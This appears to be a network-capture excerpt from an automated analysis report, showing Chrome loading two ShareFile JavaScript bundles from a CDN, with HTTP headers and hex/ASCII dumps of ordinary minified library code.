                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: s73pXtBXjCG78nSsiKP_cxEcN-cBKgHVHbxlkNaKWTVARnfZxqpr7A==
                                                                                                                                                                                                                      Age: 31249
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      68192.168.2.174978913.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC424OUTGET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 199512
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 13 Sep 2024 12:33:19 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:13 GMT
                                                                                                                                                                                                                      ETag: "38596d901c05cdcb1b7db1f4d6d21ba7"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: E33Vt-YIadsP0-WOr0B4FwZN3Ed5ilKFcZ26mECI9vB51WLy-BbI7w==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 6e 74 69 74 6c 65 6d 65 6e 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{sett
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 2c 7b 6b 65 79 3a 22 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74 29 21 3d 3d 75 6e 64 65 66 69 6e 65 64 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 65 66 61 75 6c 74 4e 53 29 2c 22 76 31 22 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 3f 46 28 46 28 7b 7d 2c 7b 7d 29 2c 74 68 69 73 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74 29 29 3a 74 68 69 73 2e 67 65 74 52 65 73 6f 75
                                                                                                                                                                                                                      Data Ascii: ,{key:"hasResourceBundle",value:function(e,t){return this.getResource(e,t)!==undefined}},{key:"getResourceBundle",value:function(e,t){return t||(t=this.options.defaultNS),"v1"===this.options.compatibilityAPI?F(F({},{}),this.getResource(e,t)):this.getResou
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 4e 75 6d 62 65 72 28 31 3d 3d 65 7c 7c 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 31 29 7d 2c 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 30 3d 3d 65 3f 30 3a 31 3d 3d 65 3f 31 3a 32 29 7d 2c 31 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 30 3d 3d 65 7c 7c 65 25 31 30 30 3e 31 26 26 65 25 31 30 30 3c 31 31 3f 31 3a 65 25 31 30 30 3e 31 30 26 26 65 25 31 30 30 3c 32 30 3f 32 3a 33 29 7d 2c 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 30 3d 3d 65 7c 7c 65 25 31 30 30 3e 30 26 26 65 25 31 30 30 3c 32 30 3f 31 3a 32 29 7d 2c 32 31 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65
                                                                                                                                                                                                                      Data Ascii: Number(1==e||e%10==1&&e%100!=11?0:1)},18:function(e){return Number(0==e?0:1==e?1:2)},19:function(e){return Number(1==e?0:0==e||e%100>1&&e%100<11?1:e%100>10&&e%100<20?2:3)},20:function(e){return Number(1==e?0:0==e||e%100>0&&e%100<20?1:2)},21:function(e){re
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 65 74 75 70 2e 20 59 6f 75 20 61 63 63 65 73 73 20 74 68 65 20 74 20 66 75 6e 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 69 31 38 6e 65 78 74 2e 69 6e 69 74 20 2f 20 69 31 38 6e 65 78 74 2e 6c 6f 61 64 4e 61 6d 65 73 70 61 63 65 20 2f 20 69 31 38 6e 65 78 74 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 20 77 61 73 20 64 6f 6e 65 2e 20 57 61 69 74 20 66 6f 72 20 74 68 65 20 63 61 6c 6c 62 61 63 6b 20 6f 72 20 50 72 6f 6d 69 73 65 20 74 6f 20 72 65 73 6f 6c 76 65 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 20 69 74 21 21 21 22 29 3a 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 6e 75 6c 6c 21 3d 3d 6e 26 26 22 22 21 3d 3d 6e 26 26 28 74 68 69 73 2e 62 61 63 6b 65 6e 64 26 26 74 68 69 73 2e 62 61 63 6b 65 6e 64 2e 63 72 65 61 74 65 26 26 74 68 69 73 2e 62
                                                                                                                                                                                                                      Data Ascii: etup. You access the t function before i18next.init / i18next.loadNamespace / i18next.changeLanguage was done. Wait for the callback or Promise to resolve before accessing it!!!"):n!==undefined&&null!==n&&""!==n&&(this.backend&&this.backend.create&&this.b
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6f 3d 74 5b 31 5d 2c 69 3d 74 5b 32 5d 2c 61 3d 74 5b 33 5d 3b 72 3d 65 2e 66 66 28 72 2c 6f 2c 69 2c 61 2c 6e 5b 30 5d 2c 37 2c 2d 36 38 30 38 37 36 39 33 36 29 2c 61 3d 65 2e 66 66 28 61 2c 72 2c 6f 2c 69 2c 6e 5b 31 5d 2c 31 32 2c 2d 33 38 39 35 36 34 35 38 36 29 2c 69 3d 65 2e 66 66 28 69 2c 61 2c 72 2c 6f 2c 6e 5b 32 5d 2c 31 37 2c 36 30 36 31 30 35 38 31 39 29 2c 6f 3d 65 2e 66 66 28 6f 2c 69 2c 61 2c 72 2c 6e 5b 33 5d 2c 32 32 2c 2d 31 30 34 34 35 32 35 33 33 30 29 2c 72 3d 65 2e 66 66 28 72 2c 6f 2c 69 2c 61 2c 6e 5b 34 5d 2c 37 2c 2d 31 37 36 34 31 38 38 39 37 29 2c 61 3d 65 2e 66 66 28 61 2c 72 2c 6f 2c 69 2c 6e 5b 35 5d 2c 31 32 2c 31 32 30 30 30 38 30 34 32 36 29 2c 69 3d 65 2e 66 66 28 69 2c 61 2c 72 2c 6f 2c 6e 5b 36 5d 2c 31 37 2c 2d 31 34
                                                                                                                                                                                                                      Data Ascii: o=t[1],i=t[2],a=t[3];r=e.ff(r,o,i,a,n[0],7,-680876936),a=e.ff(a,r,o,i,n[1],12,-389564586),i=e.ff(i,a,r,o,n[2],17,606105819),o=e.ff(o,i,a,r,n[3],22,-1044525330),r=e.ff(r,o,i,a,n[4],7,-176418897),a=e.ff(a,r,o,i,n[5],12,1200080426),i=e.ff(i,a,r,o,n[6],17,-14
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 65 78 4f 66 28 22 2e 22 29 26 26 31 3d 3d 3d 70 61 72 73 65 46 6c 6f 61 74 28 65 29 7d 29 28 65 29 26 26 28 65 3d 22 31 30 30 25 22 29 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 25 22 29 7d 28 65 29 3b 72 65 74 75 72 6e 20 65 3d 33 36 30 3d 3d 3d 74 3f 65 3a 4d 61 74 68 2e 6d 69 6e 28 74 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 70 61 72 73 65 46 6c 6f 61 74 28 65 29 29 29 2c 6e 26 26 28 65 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2a 74 29 2c 31 30 29 2f 31 30 30 29 2c 4d 61 74 68 2e 61 62 73 28 65 2d 74 29 3c 31 65 2d 36 3f 31 3a 65 3d 33 36 30 3d 3d 3d 74 3f 28 65 3c 30 3f 65 25 74 2b 74 3a 65 25 74 29 2f 70
                                                                                                                                                                                                                      Data Ascii: exOf(".")&&1===parseFloat(e)})(e)&&(e="100%");var n=function(e){return"string"==typeof e&&-1!==e.indexOf("%")}(e);return e=360===t?e:Math.min(t,Math.max(0,parseFloat(e))),n&&(e=parseInt(String(e*t),10)/100),Math.abs(e-t)<1e-6?1:e=360===t?(e<0?e%t+t:e%t)/p
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 74 72 69 6e 67 22 2c 22 73 79 6d 62 6f 6c 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 3d 3d 3d 65 7c 7c 22 61 22 2b 28 74 3c 31 3f 22 6e 20 22 3a 22 20 22 29 2b 65 7d 7d 29 29 3b 76 61 72 20 61 3d 7b 7d 3b 69 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 5b 41 78 69 6f 73 20 76 22 2b 72 2b 22 5d 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 20 6f 70 74 69 6f 6e 20 27 22 2b 65 2b 22 27 22 2b 74 2b 28 6e 3f 22 2e 20 22 2b 6e 3a 22 22 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 73 29 7b 69 66 28 21 31 3d
                                                                                                                                                                                                                      Data Ascii: tring","symbol"].forEach((function(e,t){i[e]=function(n){return typeof n===e||"a"+(t<1?"n ":" ")+e}}));var a={};i.transitional=function(e,t,n){function i(e,t){return"[Axios v"+r+"] Transitional option '"+e+"'"+t+(n?". "+n:"")}return function(n,r,s){if(!1=
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 72 67 75 74 20 74 61 6d 62 6f 76 20 74 61 74 61 72 73 74 61 6e 20 74 6f 6d 20 74 6f 6d 73 6b 20 74 73 61 72 69 74 73 79 6e 20 74 73 6b 20 74 75 6c 61 20 74 75 76 61 20 74 76 65 72 20 74 79 75 6d 65 6e 20 75 64 6d 20 75 64 6d 75 72 74 69 61 20 75 6c 61 6e 2d 75 64 65 20 76 6c 61 64 69 6b 61 76 6b 61 7a 20 76 6c 61 64 69 6d 69 72 20 76 6c 61 64 69 76 6f 73 74 6f 6b 20 76 6f 6c 67 6f 67 72 61 64 20 76 6f 6c 6f 67 64 61 20 76 6f 72 6f 6e 65 7a 68 20 76 72 6e 20 76 79 61 74 6b 61 20 79 61 6b 75 74 69 61 20 79 61 6d 61 6c 20 79 65 6b 61 74 65 72 69 6e 62 75 72 67 20 79 75 7a 68 6e 6f 2d 73 61 6b 68 61 6c 69 6e 73 6b 20 22 2c 72 77 3a 22 20 61 63 20 63 6f 20 63 6f 6d 20 65 64 75 20 67 6f 75 76 20 67 6f 76 20 69 6e 74 20 6d 69 6c 20 6e 65 74 20 22 2c 73 61 3a 22
                                                                                                                                                                                                                      Data Ascii: rgut tambov tatarstan tom tomsk tsaritsyn tsk tula tuva tver tyumen udm udmurtia ulan-ude vladikavkaz vladimir vladivostok volgograd vologda voronezh vrn vyatka yakutia yamal yekaterinburg yuzhno-sakhalinsk ",rw:" ac co com edu gouv gov int mil net ",sa:"
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 7d 3b 72 65 74 75 72 6e 20 72 2e 55 52 49 54 65 6d 70 6c 61 74 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 2e 55 52 49 54 65 6d 70 6c 61 74 65 2e 6e 6f 43 6f 6e 66 6c 69 63 74 26 26 28 74 2e 55 52 49 54 65 6d 70 6c 61 74 65 3d 72 2e 55 52 49 54 65 6d 70 6c 61 74 65 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 29 2c 72 2e 49 50 76 36 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 2e 49 50 76 36 2e 6e 6f 43 6f 6e 66 6c 69 63 74 26 26 28 74 2e 49 50 76 36 3d 72 2e 49 50 76 36 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 29 2c 72 2e 53 65 63 6f 6e 64 4c 65 76 65 6c 44 6f 6d 61 69 6e 73 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 2e 53 65 63 6f 6e 64 4c 65 76 65 6c 44
                                                                                                                                                                                                                      Data Ascii: .noConflict()};return r.URITemplate&&"function"==typeof r.URITemplate.noConflict&&(t.URITemplate=r.URITemplate.noConflict()),r.IPv6&&"function"==typeof r.IPv6.noConflict&&(t.IPv6=r.IPv6.noConflict()),r.SecondLevelDomains&&"function"==typeof r.SecondLevelD
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 63 61 70 65 51 75 65 72 79 53 70 61 63 65 29 2c 74 29 69 66 28 73 2e 63 61 6c 6c 28 74 2c 61 29 29 7b 69 66 28 6c 28 74 5b 61 5d 29 29 7b 69 66 28 21 70 28 74 5b 61 5d 2c 6e 5b 61 5d 29 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 74 5b 61 5d 21 3d 3d 6e 5b 61 5d 29 72 65 74 75 72 6e 21 31 3b 66 5b 61 5d 3d 21 30 7d 66 6f 72 28 61 20 69 6e 20 6e 29 69 66 28 73 2e 63 61 6c 6c 28 6e 2c 61 29 26 26 21 66 5b 61 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 61 2e 70 72 65 76 65 6e 74 49 6e 76 61 6c 69 64 48 6f 73 74 6e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 72 65 76 65 6e 74 49 6e 76 61 6c 69 64 48 6f 73 74 6e 61 6d 65 3d 21 21 65 2c 74 68 69 73 7d 2c 61 2e 64 75 70
                                                                                                                                                                                                                      Data Ascii: capeQuerySpace),t)if(s.call(t,a)){if(l(t[a])){if(!p(t[a],n[a]))return!1}else if(t[a]!==n[a])return!1;f[a]=!0}for(a in n)if(s.call(n,a)&&!f[a])return!1;return!0},a.preventInvalidHostname=function(e){return this._parts.preventInvalidHostname=!!e,this},a.dup


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      69192.168.2.174978813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC604OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 225101
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 14:02:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:14 GMT
                                                                                                                                                                                                                      ETag: "17f623a8a7be369c0194d4f492d9dcbf"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 ec5c4a66c1200ddcc562c6e98f77a48c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: TBBP7DW7vjpDaHKDk6e8PY5LHgbirkts_AaiAlbKUYCJQTutmF_3vA==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 61 63 6b 61 67 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defi
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC10748INData Raw: 74 69 6f 6e 20 46 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 50 72 6f 78 79 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 29 2c 21 30 7d 63 61 74 63 68
                                                                                                                                                                                                                      Data Ascii: tion F(e){var t=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 74 68 69 73 2e 69 6e 74 65 72 70 6f 6c 61 74 6f 72 2e 69 6e 69 74 28 7a 28 7a 28 7b 7d 2c 72 29 2c 7b 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 3a 7a 28 7a 28 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 29 2c 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 29 7d 29 29 3b 76 61 72 20 61 2c 73 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 72 26 26 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 26 26 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e
                                                                                                                                                                                                                      Data Ascii: this.interpolator.init(z(z({},r),{interpolation:z(z({},this.options.interpolation),r.interpolation)}));var a,s="string"==typeof e&&(r&&r.interpolation&&r.interpolation.skipOnVariables!==undefined?r.interpolation.skipOnVariables:this.options.interpolation.
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC5036INData Raw: 2c 74 29 2c 61 29 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 66 61 69 6c 65 64 20 70 61 72 73 69 6e 67 20 6f 70 74 69 6f 6e 73 20 73 74 72 69 6e 67 20 69 6e 20 6e 65 73 74 69 6e 67 20 66 6f 72 20 6b 65 79 20 22 2e 63 6f 6e 63 61 74 28 65 29 2c 67 29 2c 22 22 2e 63 6f 6e 63 61 74 28 65 29 2e 63 6f 6e 63 61 74 28 72 29 2e 63 6f 6e 63 61 74 28 69 29 7d 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 65 7d 66 6f 72 28 61 2e 61 70 70 6c 79 50 6f 73 74 50 72 6f 63 65 73 73 6f 72 3d 21 31 2c 64 65 6c 65 74 65 20 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3b 72 3d 74 68 69 73 2e 6e 65 73 74 69 6e 67 52 65 67 65 78 70 2e 65 78 65 63 28 65 29 3b 29 7b 76 61 72 20
                                                                                                                                                                                                                      Data Ascii: ,t),a))}catch(g){return this.logger.warn("failed parsing options string in nesting for key ".concat(e),g),"".concat(e).concat(r).concat(i)}return delete a.defaultValue,e}for(a.applyPostProcessor=!1,delete a.defaultValue;r=this.nestingRegexp.exec(e);){var
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC15708INData Raw: 73 7c 7c 31 30 2c 6f 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 3d 30 2c 6f 2e 6d 61 78 52 65 74 72 69 65 73 3d 73 2e 6d 61 78 52 65 74 72 69 65 73 3e 3d 30 3f 73 2e 6d 61 78 52 65 74 72 69 65 73 3a 35 2c 6f 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3d 73 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3e 3d 31 3f 73 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3a 33 35 30 2c 6f 2e 73 74 61 74 65 3d 7b 7d 2c 6f 2e 71 75 65 75 65 3d 5b 5d 2c 6f 2e 62 61 63 6b 65 6e 64 26 26 6f 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 26 26 6f 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 28 69 2c 73 2e 62 61 63 6b 65 6e 64 2c 73 29 2c 6f 7d 72 65 74 75 72 6e 28 30 2c 73 2e 41 29 28 72 2c 5b 7b 6b 65 79 3a 22 71 75 65 75 65 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c
                                                                                                                                                                                                                      Data Ascii: s||10,o.readingCalls=0,o.maxRetries=s.maxRetries>=0?s.maxRetries:5,o.retryTimeout=s.retryTimeout>=1?s.retryTimeout:350,o.state={},o.queue=[],o.backend&&o.backend.init&&o.backend.init(i,s.backend,s),o}return(0,s.A)(r,[{key:"queueLoad",value:function(e,t,r,
